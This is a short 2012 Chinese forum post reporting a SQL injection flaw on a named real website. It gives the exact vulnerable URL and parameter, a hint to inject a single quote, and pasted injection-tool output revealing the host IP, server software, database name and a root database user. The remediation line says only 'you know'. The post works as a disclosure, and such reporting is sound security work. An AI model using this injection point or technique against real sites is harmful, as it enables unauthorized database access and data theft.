灯火互联
管理员
管理员
  • 注册日期2011-07-27
  • 发帖数41778
  • QQ
  • 火币41290枚
  • 粉丝1086
  • 关注100
  • 终身成就奖
  • 最爱沙发
  • 忠实会员
  • 灌水天才奖
  • 贴图大师奖
  • 原创先锋奖
  • 特殊贡献奖
  • 宣传大使奖
  • 优秀斑竹奖
  • 社区明星
阅读:2869回复:0

100e主站再爆root注入

楼主#
更多 发布于:2012-11-18 14:54
http://100e.com/100ebooks/ProductsDetail.asp?MainProductID=2154`加个单引号试试

图片:20121118012103565.jpg





Target:http://100e.com/100ebooks/ProductsDetail.asp?MainProductID=2154
Host IP: 210.51.18.195
web Server: Microsoft-IIS/6.0
Powered-by: ASP.NET
DB Server: MySQL error based
Resp. Time(avg): 165 ms
Current User: reader@210.51.18.195
Sql Version: 5.1.41-log
Current DB: 100eDB
System User: reader@210.51.18.195
Host Name: localhost.localdomain
Installation dir: /usr/local/mysql/
DB User ; Pass: root::localhost


竟然是root,就不深入了。



图片:20121118012106815.jpg



修复方案:

你懂的。

喜欢0 评分0
游客

返回顶部